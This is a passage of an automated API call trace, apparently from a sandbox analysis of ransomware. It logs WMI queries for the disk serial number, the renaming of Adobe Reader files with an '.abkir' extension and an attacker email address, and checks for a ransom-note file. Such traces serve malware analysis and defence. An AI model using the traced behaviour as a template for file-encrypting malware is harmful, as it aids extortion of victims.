(in: This=0x6031510, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e54c | out: ppvObject=0x8f6e54c*=0x6031510) returned 0x0 [0202.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e508 | out: ppvObject=0x8f6e508*=0x0) returned 0x80004002 [0202.856] WbemDefPath:IUnknown:AddRef (This=0x6031510) returned 0x3 [0202.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6de64 | out: ppvObject=0x8f6de64*=0x0) returned 0x80004002 [0202.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6de14 | out: ppvObject=0x8f6de14*=0x0) returned 0x80004002 [0202.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6de20 | out: ppvObject=0x8f6de20*=0x66ce5b8) returned 0x0 [0202.856] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce5b8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6de28 | out: pCid=0x8f6de28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0202.856] WbemDefPath:IUnknown:Release (This=0x66ce5b8) returned 0x3 [0202.856] CoGetContextToken (in: pToken=0x8f6de80 | out: pToken=0x8f6de80) returned 0x0 [0202.856] CoGetContextToken (in: pToken=0x8f6e288 | out: pToken=0x8f6e288) returned 0x0 [0202.856] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e318 | out: ppvObject=0x8f6e318*=0x0) returned 0x80004002 [0202.856] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x2 [0202.856] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x1 [0202.857] CoGetContextToken (in: pToken=0x8f6ec10 | out: pToken=0x8f6ec10) returned 0x0 [0202.857] CoGetContextToken (in: pToken=0x8f6eb70 | out: pToken=0x8f6eb70) returned 0x0 [0202.857] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031510, riid=0x8f6ec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x8f6ec3c | out: ppvObject=0x8f6ec3c*=0x6031510) returned 0x0 [0202.857] WbemDefPath:IUnknown:AddRef (This=0x6031510) returned 0x3 [0202.857] WbemDefPath:IUnknown:Release (This=0x6031510) returned 0x2 [0202.857] WbemDefPath:IWbemPath:SetText (This=0x6031510, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0202.857] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x8f6edc0 | out: puCount=0x8f6edc0*=0x2) returned 0x0 [0202.857] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x8f6edbc*=0x0, pszText=0x0 | out: puBuffLength=0x8f6edbc*=0xf, pszText=0x0) returned 0x0 [0202.857] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x8f6edbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6edbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.857] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6edc0 | out: ppv=0x8f6edc0*=0xb51e34) returned 0x0 [0202.857] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x8f6edb8 | out: pAptType=0x8f6edb8*=1) returned 0x0 [0202.857] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x8f6edbc | out: ppvObject=0x8f6edbc*=0x0) returned 0x80004002 [0202.857] IUnknown:Release (This=0xb51e34) returned 0x1 [0202.858] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x8f6e9e0 | out: ppv=0x8f6e9e0*=0x6023a98) returned 0x0 [0202.858] WbemLocator:IUnknown:QueryInterface (in: This=0x6023a98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6ebf8 | out: ppvObject=0x8f6ebf8*=0x0) returned 0x80004002 [0202.858] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023a98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6ec0c | out: ppvObject=0x8f6ec0c*=0x6027270) returned 0x0 [0202.858] WbemLocator:IUnknown:Release (This=0x6023a98) returned 0x0 [0202.858] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e82c | out: ppvObject=0x8f6e82c*=0x6027270) returned 0x0 [0202.858] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e7e8 | out: ppvObject=0x8f6e7e8*=0x0) returned 0x80004002 [0202.858] WbemLocator:IUnknown:AddRef (This=0x6027270) returned 0x3 [0202.859] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e144 | out: ppvObject=0x8f6e144*=0x0) returned 0x80004002 [0202.859] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e0f4 | out: ppvObject=0x8f6e0f4*=0x0) returned 0x80004002 [0202.859] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e100 | out: ppvObject=0x8f6e100*=0x0) returned 0x80004002 [0202.859] CoGetContextToken (in: pToken=0x8f6e160 | out: pToken=0x8f6e160) returned 0x0 [0202.859] CoGetContextToken (in: pToken=0x8f6e568 | out: pToken=0x8f6e568) returned 0x0 [0202.859] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e5f8 | out: ppvObject=0x8f6e5f8*=0x0) returned 0x80004002 [0202.859] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x2 [0202.859] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x1 [0202.859] CoGetContextToken (in: pToken=0x8f6ebd8 | out: pToken=0x8f6ebd8) returned 0x0 [0202.859] CoGetContextToken (in: pToken=0x8f6eb38 | out: pToken=0x8f6eb38) returned 0x0 [0202.859] WbemLocator:IUnknown:QueryInterface (in: This=0x6027270, riid=0x8f6ec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x8f6ec04 | out: ppvObject=0x8f6ec04*=0x6027270) returned 0x0 [0202.859] WbemLocator:IUnknown:AddRef (This=0x6027270) returned 0x3 [0202.859] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x2 [0202.859] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x8f6ed9c | out: puCount=0x8f6ed9c*=0x2) returned 0x0 [0202.859] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=8, puBuffLength=0x8f6ed98*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ed98*=0xf, pszText=0x0) returned 0x0 [0202.859] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=8, puBuffLength=0x8f6ed98*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ed98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0202.859] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x8f6ec74 | out: ppv=0x8f6ec74*=0x6027280) returned 0x0 [0202.859] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027280, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x8f6ed08 | out: ppNamespace=0x8f6ed08*=0x60337ec) returned 0x0 [0203.257] WbemLocator:IUnknown:QueryInterface (in: This=0x60337ec, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eba4 | out: ppvObject=0x8f6eba4*=0xb5af54) returned 0x0 [0203.257] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5af54, pProxy=0x60337ec, pAuthnSvc=0x8f6ebf4, pAuthzSvc=0x8f6ebf0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec, pImpLevel=0x8f6ebdc, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4 | out: pAuthnSvc=0x8f6ebf4*=0xa, pAuthzSvc=0x8f6ebf0*=0x0, pServerPrincName=0x8f6ebe8, pAuthnLevel=0x8f6ebec*=0x6, pImpLevel=0x8f6ebdc*=0x2, pAuthInfo=0x8f6ebe0, pCapabilites=0x8f6ebe4*=0x1) returned 0x0 [0203.257] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x1 [0203.257] WbemLocator:IUnknown:QueryInterface (in: This=0x60337ec, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb98 | out: ppvObject=0x8f6eb98*=0xb5af74) returned 0x0 [0203.257] WbemLocator:IUnknown:QueryInterface (in: This=0x60337ec, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6eb94 | out: ppvObject=0x8f6eb94*=0xb5af54) returned 0x0 [0203.257] WbemLocator:IClientSecurity:SetBlanket (This=0xb5af54, pProxy=0x60337ec, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0203.257] WbemLocator:IUnknown:Release (This=0xb5af54) returned 0x2 [0203.257] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x1 [0203.257] CoTaskMemFree (pv=0xbd4918) [0203.257] WbemLocator:IUnknown:Release (This=0x6027280) returned 0x0 [0203.257] WbemLocator:IUnknown:QueryInterface (in: This=0x60337ec, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e794 | out: ppvObject=0x8f6e794*=0xb5af74) returned 0x0 [0203.258] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x8f6e750 | out: ppvObject=0x8f6e750*=0x0) returned 0x80004002 [0203.258] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x8f6e56c | out: ppvObject=0x8f6e56c*=0x0) returned 0x80004002 [0203.258] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0203.258] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x8f6e0ac | out: ppvObject=0x8f6e0ac*=0x0) returned 0x80004002 [0203.259] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x8f6e05c | out: ppvObject=0x8f6e05c*=0x0) returned 0x80004002 [0203.259] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e068 | out: ppvObject=0x8f6e068*=0xb5aed4) returned 0x0 [0203.259] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5aed4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x8f6e070 | out: pCid=0x8f6e070*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0203.259] WbemLocator:IUnknown:Release (This=0xb5aed4) returned 0x3 [0203.259] CoGetContextToken (in: pToken=0x8f6e0c8 | out: pToken=0x8f6e0c8) returned 0x0 [0203.259] CoGetContextToken (in: pToken=0x8f6e4d0 | out: pToken=0x8f6e4d0) returned 0x0 [0203.259] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e560 | out: ppvObject=0x8f6e560*=0xb5af5c) returned 0x0 [0203.259] WbemLocator:IRpcOptions:Query (in: This=0xb5af5c, pPrx=0xb5af74, dwProperty=2, pdwValue=0x8f6e588 | out: pdwValue=0x8f6e588) returned 0x80004002 [0203.259] WbemLocator:IUnknown:Release (This=0xb5af5c) returned 0x3 [0203.259] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0203.259] CoGetContextToken (in: pToken=0x8f6eaa8 | out: pToken=0x8f6eaa8) returned 0x0 [0203.259] CoGetContextToken (in: pToken=0x8f6ea08 | out: pToken=0x8f6ea08) returned 0x0 [0203.260] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x8f6ead8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x8f6ead4 | out: ppvObject=0x8f6ead4*=0x60337ec) returned 0x0 [0203.260] WbemLocator:IUnknown:AddRef (This=0x60337ec) returned 0x4 [0203.260] WbemLocator:IUnknown:Release (This=0x60337ec) returned 0x3 [0203.260] WbemLocator:IUnknown:Release (This=0x60337ec) returned 0x2 [0203.260] SysStringLen (param_1=0x0) returned 0x0 [0203.260] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60314a0, puCount=0x8f6ee6c | out: puCount=0x8f6ee6c*=0x0) returned 0x0 [0203.260] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee68*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee68*=0x20, pszText=0x0) returned 0x0 [0203.260] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee68*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee68*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.260] CoGetContextToken (in: pToken=0x8f6ead8 | out: pToken=0x8f6ead8) returned 0x0 [0203.260] WbemLocator:IUnknown:AddRef (This=0xb5af74) returned 0x3 [0203.260] WbemLocator:IUnknown:QueryInterface (in: This=0xb5af74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x8f6e96c | out: ppvObject=0x8f6e96c*=0xb5af74) returned 0x0 [0203.260] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x3 [0203.260] WbemLocator:IUnknown:Release (This=0xb5af74) returned 0x2 [0203.260] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee70*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee70*=0x20, pszText=0x0) returned 0x0 [0203.260] WbemDefPath:IWbemPath:GetText (in: This=0x60314a0, lFlags=2, puBuffLength=0x8f6ee70*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x8f6ee70*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0203.260] IWbemServices:GetObject (in: This=0x60337ec, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x8f6ee24*=0x0, ppCallResult=0x0 | out: ppObject=0x8f6ee24*=0x6027e50, ppCallResult=0x0) returned 0x0 [0203.613] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031510, puCount=0x8f6ee24 | out: puCount=0x8f6ee24*=0x2) returned 0x0 [0203.613] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x8f6ee20*=0x0, pszText=0x0 | out: puBuffLength=0x8f6ee20*=0xf, pszText=0x0) returned 0x0 [0203.613] WbemDefPath:IWbemPath:GetText (in: This=0x6031510, lFlags=4, puBuffLength=0x8f6ee20*=0xf, pszText="00000000000000" | out: puBuffLength=0x8f6ee20*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0203.613] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x363a77c*=0, plFlavor=0x363a780*=0 | out: pVal=0x8f6ee20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x363a77c*=8, plFlavor=0x363a780*=0) returned 0x0 [0203.613] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.613] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.614] IWbemClassObject:Get (in: This=0x6027e50, wszName="VolumeSerialNumber", lFlags=0, pVal=0x8f6ee28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x363a77c*=8, plFlavor=0x363a780*=0 | out: pVal=0x8f6ee28*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x363a77c*=8, plFlavor=0x363a780*=0) returned 0x0 [0203.614] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.614] SysStringByteLen (bstr="9C354B42") returned 0x10 [0203.614] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm", lpFilePart=0x0) returned 0x34 [0203.614] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x8f6ea28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x57 [0203.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee88) returned 1 [0203.614] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef04 | out: lpFileInformation=0x8f6ef04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x3297e9e0, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0203.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6ee84) returned 1 [0203.614] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMeK.htm.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmek.htm.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0203.616] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", nBufferLength=0x105, lpBuffer=0x8f6ea40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", lpFilePart=0x0) returned 0x36 [0203.616] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta", lpFilePart=0x0) returned 0x39 [0203.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eea8) returned 1 [0203.616] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\info-decrypt.hta" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x8f6ef24 | out: lpFileInformation=0x8f6ef24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x129dd140, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0x129dd140, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0x12b0dc40, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0203.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eea4) returned 1 [0203.616] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", nBufferLength=0x105, lpBuffer=0x8f6ea48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", lpFilePart=0x0) returned 0x36 [0203.616] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6eef4) returned 1 [0203.616] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), fInfoLevelId=0x0, lpFileInformation=0x363acac | out: lpFileInformation=0x363acac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807ef720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4444)) returned 1 [0203.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8f6eef0) returned 1 [0203.617] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", nBufferLength=0x105, lpBuffer=0x8f6e934, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm", lpFilePart=0x0) returned 0x36 [0203.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ee28) returned 1 [0203.617] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\ReadMePOL.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\readmepol.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x32c 